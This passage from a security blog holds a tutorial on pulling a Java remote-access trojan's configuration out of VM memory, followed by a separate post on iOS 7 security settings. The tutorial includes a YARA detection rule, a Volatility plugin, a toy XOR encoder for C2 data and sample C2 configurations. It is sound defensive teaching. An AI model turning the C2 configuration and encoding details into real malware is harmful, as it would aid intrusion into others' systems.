00000144   6F 6D 53 50 4C 49 54 09  09 09 09 09 09 09 09 09   omSPLIT.........
00000160   70 61 73 73 3D 70 61 73  73 77 6F 72 64 53 50 4C   pass=passwordSPL
00000176   49 54 0E 0E 0E 0E 0E 0E  0E 0E 0E 0E 0E 0E 0E 0E   IT..............
00000192   69 64 3D 43 41 4D 50 41  49 47 4E 53 50 4C 49 54   id=CAMPAIGNSPLIT
00000208   10 10 10 10 10 10 10 10  10 10 10 10 10 10 10 10   ................
00000224   6D 75 74 65 78 3D 66 61  6C 73 65 53 50 4C 49 54   mutex=falseSPLIT
00000240   10 10 10 10 10 10 10 10  10 10 10 10 10 10 10 10   ................
00000256   74 6F 6D 73 3D 2D 31 53  50 4C 49 54 04 04 04 04   toms=-1SPLIT....
00000272   70 65 72 3D 66 61 6C 73  65 53 50 4C 49 54 02 02   per=falseSPLIT..
00000288   6E 61 6D 65 3D 53 50 4C  49 54 06 06 06 06 06 06   name=SPLIT......
00000304   74 69 6D 65 6F 75 74 3D  66 61 6C 73 65 53 50 4C   timeout=falseSPL
00000320   49 54 0E 0E 0E 0E 0E 0E  0E 0E 0E 0E 0E 0E 0E 0E   IT..............
00000336   64 65 62 75 67 6D 73 67  3D 74 72 75 65 53 50 4C   debugmsg=trueSPL
00000352   49 54 0E 0E 0E 0E 0E 0E  0E 0E 0E 0E 0E 0E 0E 0E   IT..............

Or, even if we couldn't decrypt this, we know that it's beaconing to a very unique domain name and port which can be searched upon. Either way, we now have a sample where we can't easily get to this decrypted information. So, let's solve that.

By running the malware within a VM, we should have a logical file for the memory space. In VMWare, this is a .VMEM file (or .VMSS for snapshot memory). In VirtualBox, it's a .SAV file. After running our malware, we suspend the guest operating system and then focus our attention on the memory file.

The best way to start is to simply grep the file (from the command line or a hex editor) for the unique C2 domains or artifacts. This should get us into the general vicinity of the configuration and show us the structure of it:

E:\VMs\WinXP_Malware>grep "www.malware.com" *
Binary file WinXP_Malware.vmem matches

With this known, we open the VMEM file and see a configuration that matches what we've previously seen. This tells us that the encryption routine changed, but the configuration structure did not, which is common. This is where we bring out Volatility.

Searching Memory with Volatility

We know that the configuration data begins with the text of "port=<number>SPLIT", where "SPLIT" is used to delimit each field. This can then be used to create a YARA rule of:

rule javarat_conf {
    strings: $a = /port=[0-9]{1,5}SPLIT/ 
    condition: $a
}

This YARA rule uses a regular expression (defined with forward slashes around the text) to search for "port=" followed by a number that is 1-5 digits long. The rule will be used to get us to the beginning of the configuration data. If there is no good way to get to the beginning, but only somewhere later in the data, that's fine; just note the offset variance between where the data should start and where the YARA rule puts us.
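As a quick sanity check, the same rule can also be compiled with the standalone yara-python module and run directly against the raw memory image, outside of Volatility (a sketch; the .vmem path is illustrative):

import yara

rule = yara.compile(source='rule javarat_conf { strings: $a = /port=[0-9]{1,5}SPLIT/ condition: $a }')

with open(r'E:\VMs\WinXP_Malware\WinXP_Malware.vmem', 'rb') as f:
    matches = rule.match(data=f.read())   # note: reads the whole image into memory

print(matches)   # e.g. [javarat_conf] if the rule hits anywhere in the image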

Next, let's test this rule within Volatility itself, to ensure that it works there as well:

E:\Development\volatility>vol.py -f E:\VMs\WinXP_Malware\WinXP_Malware.vmem yarascan -Y "/port=[0-9]{1,5}SPLIT/"
Volatile Systems Volatility Framework 2.3_beta
Rule: r1
Owner: Process VMwareUser.exe Pid 1668
0x017b239b  70 6f 72 74 3d 33 31 33 33 37 53 50 4c 49 54 2e   port=31337SPLIT.
0x017b23ab  0a 30 30 30 30 30 30 31 36 20 20 20 36 46 20 37   .00000016...6F.7
0x017b23bb  33 20 33 44 20 37 37 20 36 39 20 36 45 20 32 30   3.3D.77.69.6E.20
0x017b23cb  20 36 44 20 20 36 31 20 36 33 20 35 33 20 35 30   .6D..61.63.53.50
Rule: r1
Owner: Process javaw.exe Pid 572
0x2ab9a7f4  70 6f 72 74 3d 33 31 33 33 37 53 50 4c 49 54 01   port=31337SPLIT.
0x2ab9a804  6f 73 3d 77 69 6e 20 6d 61 63 53 50 4c 49 54 01   os=win.macSPLIT.
0x2ab9a814  6d 70 6f 72 74 3d 2d 31 53 50 4c 49 54 03 03 03   mport=-1SPLIT...
0x2ab9a824  70 65 72 6d 73 3d 2d 31 53 50 4c 49 54 03 03 03   perms=-1SPLIT...

One interesting side effect of working within a VM is that some data may appear in the address space of VMwareUser.exe, showing up somewhere outside the context of our configuration. We could try to change our rule, but the simpler solution within the plugin is to just rule out hits from VMwareUser.exe and only allow hits from executables whose names contain "java".

Now that we have a rule, how do we automate this? By writing a quick and dirty plugin for Volatility.

Creating a Plugin

The quick plugin I'm demonstrating is composed of two primary components: a YARA rule and a configuration dumper. The configuration dumper scans memory for the YARA rule, reads memory, and displays the parsed results. An entire post could be written on just this file format, so instead I'll post a very generic plugin and highlight what should be modified. I wrote this based on the two existing malware dumpers already released with Volatility: Zeus and Poison Ivy.

Jamie Levy and Michael Ligh, both core developers on Volatility, provided some critical input on ways to improve and clean up the code.

# JavaRAT detection and analysis for Volatility - v 1.0
# This version is limited to JavaRAT's clients 3.0 and 3.1, and maybe others 
# Author: Brian Baskin <brian@thebaskins.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or (at
# your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details. 
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA 

import volatility.plugins.taskmods as taskmods
import volatility.win32.tasks as tasks
import volatility.utils as utils
import volatility.debug as debug
import volatility.plugins.malware.malfind as malfind
import volatility.conf as conf
import string

try:
    import yara
    has_yara = True
except ImportError:
    has_yara = False


signatures = {
    'javarat_conf' : 'rule javarat_conf {strings: $a = /port=[0-9]{1,5}SPLIT/ condition: $a}'
}

config = conf.ConfObject()
config.add_option('CONFSIZE', short_option = 'C', default = 256,
                           help = 'Config data size',
                           action = 'store', type = 'int')
config.add_option('YARAOFFSET', short_option = 'Y', default = 0,
                           help = 'YARA start offset',
                           action = 'store', type = 'int')

class JavaRATScan(taskmods.PSList):
    """ Extract JavaRAT Configuration from Java processes """

    def get_vad_base(self, task, address):
        for vad in task.VadRoot.traverse():
            if address >= vad.Start and address < vad.End:
                return vad.Start
        return None

    def calculate(self):
        """ Required: Runs YARA search to find hits """ 
        if not has_yara:
            debug.error('Yara must be installed for this plugin')

        addr_space = utils.load_as(self._config)
        rules = yara.compile(sources = signatures)
        for task in self.filter_tasks(tasks.pslist(addr_space)):
            if 'vmwareuser.exe' == task.ImageFileName.lower():
                continue
            if not 'java' in task.ImageFileName.lower():
                continue
            scanner = malfind.VadYaraScanner(task = task, rules = rules)
            for hit, address in scanner.scan():
                vad_base_addr = self.get_vad_base(task, address)
                yield task, address

    def make_printable(self, input):
        """ Optional: Remove non-printable chars from a string """
        input = input.replace('\x09', '')  # string.printable doesn't remove tabs
        return ''.join(filter(lambda x: x in string.printable, input))

    def parse_structure(self, data):
        """ Optional: Parses the data into a list of values """
        struct = []
        items = data.split('SPLIT')
        for i in range(len(items) - 1):  # Iterate this way to ignore any slack data behind last 'SPLIT'
            item = self.make_printable(items[i])
            field, value = item.split('=')
            struct.append('%s: %s' % (field, value))
        return struct
    
    def render_text(self, outfd, data):
        """ Required: Parse data and display """
        delim = '-=' * 39 + '-'
        rules = yara.compile(sources = signatures)
        outfd.write('YARA rule: {0}\n'.format(signatures))
        outfd.write('YARA offset: {0}\n'.format(self._config.YARAOFFSET))
        outfd.write('Configuration size: {0}\n'.format(self._config.CONFSIZE))
        for task, address in data:  # iterate the yield values from calculate()
            outfd.write('{0}\n'.format(delim))
            outfd.write('Process: {0} ({1})\n\n'.format(task.ImageFileName, task.UniqueProcessId))
            proc_addr_space = task.get_process_address_space()
            conf_data = proc_addr_space.read(address + self._config.YARAOFFSET, self._config.CONFSIZE)
            config = self.parse_structure(conf_data)
            for i in config:
                outfd.write('\t{0}\n'.format(i))

This code is also available on my GitHub.

In a nutshell, you first have a signature to key on for the configuration data. This is a fully qualified YARA signature, seen as:

signatures = {
    'javarat_conf' : 'rule javarat_conf {strings: $a = /port=[0-9]{1,5}SPLIT/ condition: $a}'
}
This rule is stored in a Python dictionary format of 'rule_name' : 'rule contents'.

The plugin allows a command-line argument (-Y) to set the YARA offset. If your YARA signature hits 80 bytes past the beginning of the structure, then set this value to -80, and vice versa. This can also be hardcoded by changing the default value.

There is a second command-line argument (-C) to set the size of the data to read for parsing. This can also be hardcoded. It will vary based upon the malware; I've seen some configurations multiple kilobytes in size.

Rename the Class value, seen here as JavaRATScan, to whatever fits for your malware. It has to be a unique name. Additionally, the """ """ comment block below the class name contains the description which will be displayed on the command line.

I do have an optional rule to limit the search to a certain subset of processes. In this case, only processes that contain the word "java" - this is a Java-based RAT, after all. It also skips the VMwareUser.exe process.

The plugin contains a parse_structure routine that is fed a block of data. It then parses it into a list of items that are returned and printed to the screen (or to a file, or whatever output is desired). This will ultimately be unique to each malware family, and the optional make_printable() function is one I made to clean up the non-printable characters from the output, allowing me to extend the blocked keyspace.

Running the Plugin

As a rule, I place all of my Volatility plugins into their own unique directory. I then reference this upon runtime, so that my files are cleanly segregated. This is performed via the --plugins option in Volatility:
E:\Development\volatility>vol.py --plugins=..\Volatility_Plugins
After specifying a valid plugins folder, run vol.py with the -h option to ensure that your new scanner appears in the listing:
E:\Development\volatility>vol.py --plugins=..\Volatility_Plugins -h
Volatile Systems Volatility Framework 2.3_beta
Usage: Volatility - A memory forensics analysis platform.

Options:
...

        Supported Plugin Commands:

                apihooks        Detect API hooks in process and kernel memory
...
                javaratscan  Extract JavaRAT Configuration from Java processes
...
The names are automatically populated based upon your class names. The text description is automatically pulled from the "docstring", which is the comment that directly follows the class name in the plugin. 
With these in place, run your scanner and cross your fingers.
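For reference, an invocation against the image used earlier would look something like this (add -C or -Y if the defaults don't suit your sample; paths are illustrative):

E:\Development\volatility>vol.py --plugins=..\Volatility_Plugins -f E:\VMs\WinXP_Malware\WinXP_Malware.vmem javaratscan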

For future use, I'd recommend prepending your plugin name with a unique identifier to make it stand out, like "SOC_JavaRATScan". Prepending with "zz_" would make the new plugins appear at the bottom of Volatility's help screen. Regardless, it'll help keep the built-in plugins apart from your custom ones.

The Next Challenge: Data Structures


The greater challenge is when data is read from within the executable into a data structure in memory. While the data may have a concise and structured form when stored in the file, it may be transformed into a more complex and unwieldy format once read into memory by the malware. Some samples may decrypt the data in-place, then load it into a structure. Others decrypt it on-the-fly so that it is only visible after loading into a structure.

For example, take the following fictitious C2 data stored in the overlay of an executable:

Offset      0  1  2  3  4  5  6  7   8  9 10 11 12 13 14 15

00000000   08 A2 A0 AC B1 A0 A8 A6  AF 17 89 95 95 91 DB CE   .¢ ¬± ¨¦¯.‰••‘ÛÎ
00000016   CE 96 96 96 CF 84 97 88  8D 92 88 95 84 CF 82 8E   Ζ––Ï„—ˆ’ˆ•„Ï‚Ž
00000032   8C 03 D5 D5 D2 08 B1 A0  B2 B2 B6 AE B3 A5 05 84   Œ.ÕÕÒ.± ²²¶®³¥.„
00000048   99 95 93 80                                        ™•“€

By reversing the malware, we determine that this is composed of Pascal strings XOR-encoded with 0xE1. Pascal strings are length-prefixed, so applying the correct decoding would result in:

Offset      0  1  2  3  4  5  6  7   8  9 10 11 12 13 14 15

00000000   08 43 41 4D 50 41 49 47  4E 17 68 74 74 70 3A 2F   .CAMPAIGN.http:/
00000016   2F 77 77 77 2E 65 76 69  6C 73 69 74 65 2E 63 6F   /www.evilsite.co
00000032   6D 03 34 34 33 08 50 41  53 53 57 4F 52 44 05 65   m.443.PASSWORD.e
00000048   78 74 72 61                                        xtra

This is a very simple encoding routine, which I made with just:

items = ['CAMPAIGN', 'http://www.evilsite.com', '443', 'PASSWORD', 'extra']
data = ''
for i in items:
    data += chr(len(i))
    for x in i: data += chr(ord(x) ^ 0xE1)
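The matching decoder simply reverses this: read a length byte, then XOR that many bytes with 0xE1 (a sketch in the same Python 2 style as the snippet above; overlay_data would be the raw bytes pulled from the overlay):

def decode(data, key=0xE1):
    # Walk the blob: each field is a plain (unencoded) length byte followed
    # by that many XOR-encoded characters.
    items = []
    pos = 0
    while pos < len(data):
        length = ord(data[pos])
        pos += 1
        items.append(''.join(chr(ord(c) ^ key) for c in data[pos:pos + length]))
        pos += length
    return items

# decode(overlay_data) -> ['CAMPAIGN', 'http://www.evilsite.com', '443', 'PASSWORD', 'extra']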


Data structures are a subtle and difficult component of reverse engineering, and vary in complexity with the skill of the malware author. Unfortunately, data structures are some of the least shared indicators in the industry.

Once completed, a sample structure could appear similar to the following:

struct Configuration
{
    CHAR campaign_id[12];
    CHAR password[16];
    DWORD heartbeat_interval;
    CHAR C2_domain[48];
    DWORD C2_port;
}

With this structure, and the data shown above, the malware reads each variable in and applies it to the structure. But we can already see some discrepancies: the items are in a different order, and some are of a different type. While the C2 port is seen as a string, '443', in the file, it appears as a DWORD once read into memory. That means that we'll be searching for 0x01BB (or 0xBB01, depending on endianness) instead of '443'. Additionally, there are other values to contend with that did not exist statically within the file.

An additional challenge is that, depending on how the memory was allocated, there could be slack data found within the structure. This could happen if the malware sample allocates memory with malloc() without a memset(), rather than using calloc().

When read and applied to the structure, this data may appear as the following:

Offset      0  1  2  3  4  5  6  7   8  9 10 11 12 13 14 15

00000000   43 41 4D 50 41 49 47 4E  00 0C 0C 00 00 50 41 53   CAMPAIGN.....PAS
00000016   53 57 4F 52 44 00 00 00  00 00 00 00 00 00 17 70   SWORD..........p
00000032   68 74 74 70 3A 2F 2F 77  77 77 2E 65 76 69 6C 73   http://www.evils
00000048   69 74 65 2E 63 6F 6D 00  00 00 00 00 00 00 00 00   ite.com.........
00000064   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00000080   00 00 01 BB                                        ...»

We can see from this that our strategy changes considerably when writing a configuration dumper. The dumper won't be written based upon the structure in the file, but instead upon the data structure in memory, after it has been converted and formatted. We'll have to change our parser slightly to account for this. For example, if you know that the Campaign ID is 12 bytes, then read 12 bytes of data and find the null terminator to pull the actual string.
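A minimal sketch of that approach, using the declared structure as a guide (field offsets, padding, and endianness must be confirmed against the real sample in a debugger; the password and heartbeat fields are left out here, and note, for instance, the extra byte of slack before PASSWORD in the dump above, exactly the kind of quirk you have to account for):

import struct

def cstring(buf):
    # A fixed-size CHAR field: keep everything up to the null terminator.
    return buf.split('\x00', 1)[0]

def parse_config(data):
    campaign  = cstring(data[0:12])                   # CHAR campaign_id[12]
    c2_domain = cstring(data[32:80])                  # CHAR C2_domain[48]
    c2_port   = struct.unpack('>I', data[80:84])[0]   # DWORD C2_port; '>I' matches the example
                                                      # dump above, use '<I' if the sample
                                                      # stores it little-endian
    return {'campaign': campaign, 'domain': c2_domain, 'port': c2_port}

# e.g. parse_config(conf_data) -> {'campaign': 'CAMPAIGN', 'domain': 'http://www.evilsite.com', 'port': 443}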

This just scratches the surface of what you can do with encrypted data in memory, but I hope it can inspire others to use this template code to make quick and easy configuration dumpers to improve their malware analysis.

iOS 7 Security Settings and Recommendations

By Kunjan Shah.

Apple finally released the much-anticipated iOS 7 last Wednesday, September 18th. A lot of people are rushing to update to this latest version; it hit 18% adoption just 24 hours after its release. I gotta admit, I love the look and feel of it, and it feels like a completely new phone in my hand. In this blog post I have tried to explain some of the new and modified security settings and features that you should be aware of before you move to iOS 7.

Recent Hacks

iOS 7 Lock Screen Bypass Flaw

Just one day after its release, an iOS 7 lock screen bypass flaw was identified by a user, as shown in this video. I tried it out on my iPhone 5 running iOS 7 and it is a fairly simple trick. This comes after a similar flaw was identified in the beta version of iOS 7 some time back. Maybe a good reason not to jump to iOS 7 right away? Until an official fix is released by Apple, you can disable access to the Control Center from the locked screen, as discussed below.

Yet another bug gives an attacker the ability to bypass the lock screen and make calls.

Siri Abuse to Post Facebook Updates

Siri gains more power in iOS 7, maybe too much power. This vulnerability showed that while certain Siri commands are restricted (preventing the user from posting to Facebook), there are alternate commands that accomplish the same task but are unrestricted.

Apple TouchID Bypass and Drama

The latest iPhone models include a fingerprint reader called TouchID. The intention behind this addition was in the right place but, as shown by the CCC, fingerprints should not be used as a security identifier. Hacking TouchID got tons of attention from the security community due to a crowd-funding venture; however, it appears that a fraudster named Arturas Rosenbacher took much of the credit for the venture, made false promises, and never paid up, creating a little drama in the industry.

Notification Center

Notification Center, which was first introduced with iOS 5, gets a facelift in iOS 7. One of the key security distinctions this time around is that you can now access Notification Center from the locked screen. Notification Center is a hub of information ranging from calendar entries, reminders, and stocks to missed calls, messages, etc. Unless you have a very good reason to keep it accessible from the locked screen, I recommend disabling it there. To do so, navigate to Settings > Notification Center and toggle “Notification View” and “Today View” to off, as shown below.



Control Center

With iOS 7 Apple has introduced Control Center, which lets you access frequently used settings by swiping up from the bottom of the screen. This feature, similar to Notification Center, is accessible from the locked screen by default. It lets you modify settings such as Wi-Fi, Bluetooth, Airplane Mode, Airdrop, etc. Again, it is recommended that you disable this feature from the locked screen. As shown in this video, having Control Center accessible from a locked device can let anyone in possession of your iPhone bypass the lock screen completely. This is another very good reason to disable access to it from the locked screen.

You can disable it from under Settings > Control Center. Toggle “Access on Lock Screen” to off as shown in the figure below.



Airdrop

With OS X Lion, Apple introduced a new peer-to-peer file sharing feature called Airdrop for Mac users. This feature is now also available to iOS 7 users on iPhone 5 models. It lets you transfer maps, pictures, and videos over Wi-Fi and Bluetooth to other users in close proximity. One of the settings for Airdrop lets you choose whether your iPhone is discoverable by everyone or just your contacts. It is recommended that you select “Contacts Only”, as it is a safer alternative to “Everyone”, unless you want to receive file sharing requests from anonymous people around you.



Powerful New Siri

iOS 7 introduces a more powerful version of Siri with additional commands that let you change settings on the fly from the locked screen, such as “Enable Bluetooth” or “Turn on Airplane Mode”. You can also find recent tweets, post to Facebook, read and reply to new messages, view missed calls, listen to voice messages, etc., from the locked screen using Siri.



It is recommended that you disable access to Siri from a locked screen. To do so, go to Settings > General > Passcode Lock and disable Siri and other settings as shown in the figure below.



Activation Lock

This is one of the nicest security features that Apple has introduced with iOS 7. In an attempt to prevent thieves from reselling stolen iPhones by simply resetting them and swapping the SIM card, Apple introduced a feature called “Activation Lock” to augment its Find My iPhone service. This feature prevents someone from erasing all the data and re-activating the device, or turning Find My iPhone off, without first entering the Apple ID and password. When you first upgrade to iOS 7, Apple asks for your Apple ID to enable this feature. To enable it at a later stage, simply go to Settings > iCloud and toggle the Find My iPhone setting to on. To read more about this topic, visit this post.



Privacy Controls in iOS 7

Microphone (New Feature)

iOS 7 now asks for the user's permission if an application intends to access the microphone. In previous versions of iOS, such permissions were limited to contacts, calendars, photos, etc. This is a nice new privacy control. You can see which apps have been authorized to access the microphone, and revoke access, by going to Settings > Privacy > Microphone.



Private Browsing Button (Re-designed)

The “Private” browsing setting has been moved out of “Settings” and is now more easily available within Safari. You can enable “Private” browsing by navigating to bookmarks in Safari and tapping the “Private” button in the bottom left corner. Moreover, you can ask sites not to track you by going to Settings > Safari and turning “Do Not Track” on.



Limit Ad Tracking (Re-designed)

This feature lets you limit ad tracking and reset your device’s “Advertising Identifier”. This prevents companies from sending you targeted advertisements through a unique tracking number tied to your device. To enable this option go to Settings > Privacy > Limit Ad Tracking and turn it on as shown below.



Frequent Locations

When you first upgrade to iOS 7, it asks you if you want it to remember the places that you frequently visit. If you opt in, the Frequent Locations setting saves this information and transmits it anonymously to Apple to improve Maps. There is no surprise here that the iPhone keeps track of places you frequently visit, if you followed the Location-gate fiasco that unfolded in 2011, when a database of Wi-Fi hotspots was discovered on iOS 4 devices. However, now Apple is being more transparent about it and provides an option for users to opt in. The good thing is that this is turned off by default in iOS 7. It is no longer a developer-only setting, but a consumer feature, according to Apple. If you opted in by mistake and want to opt out, go to Settings > Privacy > Location Services, scroll down to System Services at the bottom of the screen, and toggle Frequent Locations to off.

In addition to this, I recommend turning off the “Diagnostics & Usage” and “Location-Based iAds” settings as well. The Diagnostics & Usage setting monitors what you do on your device and anonymously sends it to Apple to improve iOS. iAds caused a lot of noise in 2010 when Apple published its long privacy policy. The bottom line is that if you don't care for targeted ads, you should probably disable this.



Blocking Contacts (New Feature)

With iOS 7 you now have the ability to block contacts for phone calls, iMessage, and FaceTime. To block someone, go to Settings > Messages or FaceTime and scroll down to “Blocked”. From here you will be able to add the contacts that you want blocked, as shown below.



References

  1. http://www.macworld.com/article/2048738/get-to-know-ios-7-changes-in-the-settings-app.html
  2. http://blogs.wsj.com/digits/2013/09/18/how-to-use-apples-new-ios-7-privacy-controls/
  3. http://www.pcmag.com/article2/0,2817,2423635,00.asp
  4. http://www.buzzfeed.com/charliewarzel/this-is-what-it-looks-like-when-your-phone-tracks-your-every
  5. http://resources.infosecinstitute.com/ios-application-security-part-6-new-security-features-in-ios-7/
  6. http://www.idownloadblog.com/2013/08/08/a-closer-look-at-frequent-locations-in-ios-7/